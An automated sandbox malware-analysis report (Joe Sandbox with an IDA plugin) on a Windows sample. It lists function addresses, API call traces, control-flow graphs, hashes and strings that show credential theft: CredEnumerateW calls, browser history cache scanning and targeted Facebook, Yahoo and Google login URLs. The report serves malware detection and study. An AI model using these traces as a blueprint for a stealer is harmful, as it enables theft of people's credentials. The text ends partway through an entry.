                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                            • String ID:
                                                            • API String ID: 3715365532-3916222277
                                                            • Opcode ID: 0b5d2420ae1e05a47c945b1ba07dbbc3733902293ebddf2e47a1979dcc9084dd
                                                            • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                            • Opcode Fuzzy Hash: 0b5d2420ae1e05a47c945b1ba07dbbc3733902293ebddf2e47a1979dcc9084dd
                                                            • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                            Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                              • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                              • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                              • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                              • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                              • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                            • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                            • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                            • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                              • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                              • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                              • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                            • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                            • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                            • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                            • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                            • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                            • CloseHandle.KERNEL32(?), ref: 0040E148
                                                            • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                            • String ID: bhv
                                                            • API String ID: 4234240956-2689659898
                                                            • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                            • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                            • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                            • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                            Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 886 413f4f-413f52 887 413fa5 886->887 888 413f54-413f5a call 40a804 886->888 890 413f5f-413fa4 GetProcAddress * 5 888->890 890->887
                                                            APIs
                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                            • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                            • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                            • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                            • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                            • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                            • API String ID: 2941347001-70141382
                                                            • Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                            • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                            • Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                            • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                            Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • memset.MSVCRT ref: 0040C298
                                                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                            • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                            • wcschr.MSVCRT ref: 0040C324
                                                            • wcschr.MSVCRT ref: 0040C344
                                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                            • GetLastError.KERNEL32 ref: 0040C373
                                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                            • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                            • String ID: visited:
                                                            • API String ID: 2470578098-1702587658
                                                            • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                            • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                            • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                            • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                            Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 916 40e175-40e1a1 call 40695d call 406b90 921 40e1a7-40e1e5 memset 916->921 922 40e299-40e2a8 call 4069a3 916->922 924 40e1e8-40e1f3 call 406e8f 921->924 927 40e1f8-40e1fa 924->927 928 40e270-40e27d call 406b53 927->928 929 40e1fc-40e219 call 40dd50 * 2 927->929 928->924 934 40e283-40e286 928->934 929->928 940 40e21b-40e21d 929->940 937 40e291-40e294 call 40aa04 934->937 938 40e288-40e290 free 934->938 937->922 938->937 940->928 941 40e21f-40e235 call 40742e 940->941 941->928 944 40e237-40e242 call 40aae3 941->944 944->928 947 40e244-40e26b _snwprintf call 40a8d0 944->947 947->928
                                                            APIs
                                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                            • memset.MSVCRT ref: 0040E1BD
                                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                            • free.MSVCRT ref: 0040E28B
                                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                              • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                              • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                            • _snwprintf.MSVCRT ref: 0040E257
                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                            • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                            • API String ID: 2804212203-2982631422
                                                            • Opcode ID: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
                                                            • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                            • Opcode Fuzzy Hash: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
                                                            • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                            Function 0040BDB0 Relevance: 13.7, APIs: 9, Instructions: 151COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 965 40bdb0-40bdce call 404363 968 40bf63-40bf6f call 40440c 965->968 969 40bdd4-40bddd 965->969 970 40bdee 969->970 971 40bddf-40bdec CredEnumerateW 969->971 973 40bdf0-40bdf2 970->973 971->973 973->968 975 40bdf8-40be18 call 40b2cc wcslen 973->975 978 40bf5d-40bf60 LocalFree 975->978 979 40be1e-40be20 975->979 978->968 979->978 980 40be26-40be42 wcsncmp 979->980 981 40be48-40be77 call 40bd5d call 404423 980->981 982 40bf4e-40bf57 980->982 981->982 987 40be7d-40bea3 memset 981->987 982->978 982->979 988 40bea5 987->988 989 40bea7-40beea memcpy 987->989 988->989 990 40bf11-40bf2d wcschr 989->990 991 40beec-40bf06 call 40b2cc _wcsnicmp 989->991 993 40bf38-40bf48 LocalFree 990->993 994 40bf2f-40bf35 990->994 991->990 996 40bf08-40bf0e 991->996 993->982 994->993 996->990
                                                            APIs
                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                            • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                            • wcslen.MSVCRT ref: 0040BE06
                                                            • wcsncmp.MSVCRT ref: 0040BE38
                                                            • memset.MSVCRT ref: 0040BE91
                                                            • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                            • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                            • wcschr.MSVCRT ref: 0040BF24
                                                            • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                            • LocalFree.KERNELBASE(?,00000214,?,00000000,?), ref: 0040BF60
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$FreeLocal$CredEnumerate_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                            • String ID:
                                                            • API String ID: 1564206659-0
                                                            • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                            • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                            • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                            • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                            Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 998 40bb98-40bbcc call 44db70 call 40cbe1 call 40cc26 1005 40bbd2-40bbd8 call 40cf04 998->1005 1006 40bd4b-40bd5a call 40cc0c 998->1006 1010 40bbdd-40bbdf 1005->1010 1010->1006 1011 40bbe5-40bbf9 call 40b2cc call 40ccf0 1010->1011 1011->1006 1016 40bbff-40bc19 call 40cbe1 call 40a9b5 1011->1016 1021 40bc1b 1016->1021 1022 40bc1d-40bc30 call 40ccb4 call 40cf04 1016->1022 1021->1022 1027 40bd43-40bd46 call 40cc0c 1022->1027 1028 40bc36-40bc48 call 40b2cc call 40ccf0 1022->1028 1027->1006 1028->1027 1034 40bc4e-40bc5d call 40a9b5 1028->1034 1037 40bc61-40bce0 memset * 2 WideCharToMultiByte call 40103c call 40b273 memcmp 1034->1037 1038 40bc5f 1034->1038 1037->1027 1043 40bce2-40bd12 call 404423 1037->1043 1038->1037 1043->1027 1046 40bd14-40bd17 1043->1046 1046->1027 1047 40bd19-40bd1d 1046->1047 1048 40bd3a-40bd3d LocalFree 1047->1048 1049 40bd1f-40bd33 memcpy 1047->1049 1048->1027 1049->1048
                                                            APIs
                                                              • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                              • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                              • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                            • memset.MSVCRT ref: 0040BC75
                                                            • memset.MSVCRT ref: 0040BC8C
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                            • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                            • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                            • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                            • String ID:
                                                            • API String ID: 115830560-3916222277
                                                            • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                            • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                            • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                            • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                            Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                            • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                            • GetLastError.KERNEL32 ref: 0041847E
                                                            • free.MSVCRT ref: 0041848B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CreateFile$ErrorLastfree
                                                            • String ID: |A
                                                            • API String ID: 77810686-1717621600
                                                            • Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                            • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                            • Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                            • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                            Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 0041249C
                                                            • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                            • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                            • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                            • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                            • wcscpy.MSVCRT ref: 004125A0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                            • String ID: r!A
                                                            • API String ID: 2791114272-628097481
                                                            • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                            • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                            • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                            • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                            Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                              • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                              • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                              • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                              • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                              • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                              • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                            • _wcslwr.MSVCRT ref: 0040C817
                                                              • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                              • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                            • wcslen.MSVCRT ref: 0040C82C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                            • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                            • API String ID: 2936932814-4196376884
                                                            • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                            • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                            • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                            • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                            Function 0040A804 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 40libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 0040A824
                                                            • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                            • wcscpy.MSVCRT ref: 0040A854
                                                            • wcscat.MSVCRT ref: 0040A86A
                                                            • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                            • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                            • String ID: C:\Windows\system32
                                                            • API String ID: 669240632-2896066436
                                                            • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                            • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                            • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                            • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                            Function 00403C9C Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 00403CBF
                                                            • memset.MSVCRT ref: 00403CD4
                                                            • memset.MSVCRT ref: 00403CE9
                                                            • memset.MSVCRT ref: 00403CFE
                                                            • memset.MSVCRT ref: 00403D13
                                                              • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                              • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                            • memset.MSVCRT ref: 00403DDA
                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                            Strings
                                                            Memory Dump Source
